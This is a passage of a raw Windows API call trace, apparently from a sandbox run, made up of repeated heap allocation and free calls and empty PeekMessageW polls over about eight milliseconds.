RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa0f0 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa138 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa150 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa168 [0246.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa138 | out: hHeap=0xbe0000) returned 1 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a58 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa138 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa198 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1b0 [0246.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa180 | out: hHeap=0xbe0000) returned 1 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a68 [0246.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa180 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1c8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1e0 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1f8 [0246.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa1c8 | out: hHeap=0xbe0000) returned 1 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a78 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa1c8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa210 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa228 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa240 [0246.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa210 | out: hHeap=0xbe0000) returned 1 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a88 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa210 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa258 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa270 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa288 [0246.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa258 | out: hHeap=0xbe0000) returned 1 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21a98 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa258 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa2a0 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa2b8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa2d0 [0246.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa2a0 | out: hHeap=0xbe0000) returned 1 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21aa8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa2a0 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa2e8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa300 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa318 [0246.517] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa2e8 | out: hHeap=0xbe0000) returned 1 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21ab8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa2e8 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa330 [0246.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa348 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa360 [0246.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa330 | out: hHeap=0xbe0000) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21ac8 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa330 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa378 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa390 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa3a8 [0246.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa378 | out: hHeap=0xbe0000) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21ad8 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa378 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa3c0 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa3d8 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa3f0 [0246.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa3c0 | out: hHeap=0xbe0000) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21ae8 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa3c0 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa408 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa420 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa438 [0246.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa408 | out: hHeap=0xbe0000) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21af8 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa408 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa450 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa468 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa480 [0246.518] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa450 | out: hHeap=0xbe0000) returned 1 [0246.518] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b08 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa450 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa498 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa4b0 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa4c8 [0246.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa498 | out: hHeap=0xbe0000) returned 1 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b48 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa498 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa4e0 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa4f8 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa510 [0246.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa4e0 | out: hHeap=0xbe0000) returned 1 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b38 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa4e0 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa528 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa540 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa558 [0246.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa528 | out: hHeap=0xbe0000) returned 1 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b28 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa528 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa570 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa588 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa5a0 [0246.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa570 | out: hHeap=0xbe0000) returned 1 [0246.519] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b18 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa570 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa5b8 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa5d0 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa5e8 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa5b8 | out: hHeap=0xbe0000) returned 1 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218f8 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa5b8 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9df0 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa678 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa660 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9df0 | out: hHeap=0xbe0000) returned 1 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b68 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9df0 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9dd8 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b80 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6d8 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9dd8 | out: hHeap=0xbe0000) returned 1 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21988 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9dd8 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d60 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9be0 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d48 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9d60 | out: hHeap=0xbe0000) returned 1 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc21b88 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9d60 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9bc8 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6f0 [0246.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9b50 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9bc8 | out: hHeap=0xbe0000) returned 1 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ad8 | out: hHeap=0xbe0000) returned 1 [0246.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9da8 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9dc0 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9ac0 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc1e2a8 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc218d8 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xc218d8 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.521] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.521] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x38) returned 0xc5d5e0 [0246.521] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.521] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.521] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.522] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.522] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.523] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.523] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21978 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xc21b98 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21b98 | out: hHeap=0xbe0000) returned 1 [0246.524] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcfa6c0 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xc21978 | out: hHeap=0xbe0000) returned 1 [0246.524] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcfa6c0 | out: hHeap=0xbe0000) returned 1 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) returned 0 [0246.524] PeekMessageW (in: lpMsg=0x8bf4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4d4) 